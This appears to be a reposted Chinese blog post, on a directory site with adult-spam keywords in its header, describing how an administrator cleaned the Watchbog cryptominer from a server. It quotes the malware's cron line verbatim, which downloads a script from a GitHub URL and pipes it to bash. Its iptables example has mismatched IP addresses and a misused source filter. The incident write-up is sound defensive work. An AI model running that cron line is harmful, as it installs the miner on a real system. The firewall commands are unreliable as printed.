日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

服務(wù)器被挖礦了?用這個思路可以徹底解決概述一、Watchbog挖礦病毒二、解決過程總結(jié)

發(fā)布時間:2023-07-03 15:49:38 作者:網(wǎng)友整理

概述

最近運氣不太好,居然有臺服務(wù)器被挖礦了,下面記錄下問題發(fā)生的過程和解決方法,僅供參考。

一、Watchbog挖礦病毒

1、服務(wù)器收到cpu報警,cpu被占用達到100%,登錄服務(wù)器查看,發(fā)現(xiàn)cpu被一個watchbog的進程占滿了,如下圖所示:

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

2、殺掉會話

發(fā)現(xiàn)用kill殺掉后,這個進程還是會隔一會自動起來,很明顯被加入了定時任務(wù),檢查所示:

*/9 * * * * (curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O- https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||Python -c 'import urllib2 as fbi;print fbi.urlopen("ht
tps://github.com/luckysBoys/lucks/blob/master/5.sh").read()'||curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||curl -fsSLk https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh -m 90||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh --no-check-certificate -t 2 -T 60)|bash
服務(wù)器被挖礦了?用這個思路可以徹底解決

 

打開這個URL,發(fā)現(xiàn)像是一堆base64的密文,密文地址。

3、當(dāng)清除掉定時任務(wù)的內(nèi)容之后,隔了一會,其又被加入了如上一模一樣的內(nèi)容,所以該病毒程序不是一般的病毒程序。

4、經(jīng)過后來的了解,發(fā)現(xiàn)該進程watchbog為被植入的挖礦程序,該程序會在cron下面寫入腳本,定期去pastebin.com下載木馬開始挖礦,如果刪除不徹底仍然會不定期啟動這個挖礦程序。

二、解決過程

1、 修改/etc/hosts

通過觀察定時任務(wù)內(nèi)容,可以發(fā)現(xiàn)幾個惡意網(wǎng)址,分別如下:

1)raw.githubusercontent.com
2)github.com

先將上述這些地址重定向到本地

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

2、防火墻控制出入流量

將上述被攻擊者攜帶的域名所對應(yīng)的的ip地址進行ip限制。

--比如raw.githubusercontent.com對應(yīng)的ip為10.20.208.21
iptables -A INPUT -s 10.20.209.21 -j DROP
iptables -A OUTPUT -s 10.20.209.21 -j DROP
iptables -A OUTPUT -j DROP -d 10.20.209.2
--保存修改內(nèi)容
/sbin/service iptables save

3、移除curl get腳本

因為該挖礦程序會借助curl、wget命令去下載病毒,所以第一時間我們需要進行如下操作:

mv /usr/bin/curl /usr/bin/lruc
mv /usr/bin/wget /usr/bin/tegw

如果確認(rèn)病毒徹底被刪除,我們可以不需要操作。

 

4、 刪掉cron里面的相關(guān)任務(wù)

crontab -l 
/etc/cron.d 
/etc/cron.deny 
/etc/cron.monthly 
/etc/cron.daily 
/etc/cron.hourly 
/etc/crontab 
/etc/cron.weekly

上述8個與cron相關(guān)的文件目錄我們都需要仔細(xì)檢查一遍,凡是有關(guān)不知名的域名等信息都要徹底刪除。

1) crontab -l

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

2)/etc/cron.d

該目錄下新增了好幾個命令:Appache、root、system

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

3)/etc/cron.deny

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

沒有發(fā)現(xiàn)

4)/etc/cron.monthly

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

5)/etc/cron.daily

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

6)/etc/cron.hourly

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

7)/etc/crontab

在crontab文件中還發(fā)現(xiàn)了新的潛藏命令httpntp、ftpDNS

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

8)/etc/cron.weekly

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

沒有發(fā)現(xiàn)

最后在用find過濾一遍,確保完全清除干凈。

5、 刪除惡意命令

同時我們還發(fā)現(xiàn)了惡意命令/bin/httpntp、/bin/ftpsdns、/usr/bin/watchbog

服務(wù)器被挖礦了?用這個思路可以徹底解決

 


服務(wù)器被挖礦了?用這個思路可以徹底解決

 

之所以看到這些惡意命令,是從定時任務(wù)日志(/var/log/cron)中發(fā)現(xiàn)的。

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

6、 刪除tmp目錄下timesyncc.service文件

文件詳情如下:

服務(wù)器被挖礦了?用這個思路可以徹底解決

 

7、殺掉watchbog進程

ps -ef|grep watchbog|awk '{print $2}'|xargs kill -9

總結(jié)

面對挖礦進程我簡單總結(jié)了以下幾點,如果遇到挖礦進程處理先后順序如下:

1)查看定時任務(wù),找到挖礦程序在執(zhí)行的內(nèi)容。

2)將惡意網(wǎng)址的hosts全部重定向到本地(127.0.0.1)

3)仔細(xì)查看審核與定時任務(wù)有關(guān)的文件和目錄,進行清除

4)刪除惡意的命令與包,重命名系統(tǒng)中被利用的命令

5)殺掉對應(yīng)惡意進程(為什么放到最后呢?因為就算最早殺掉,其還是會因為定時任務(wù)等等自動啟動)

分享到:
標(biāo)簽:挖礦
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運動步數(shù)有氧達人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定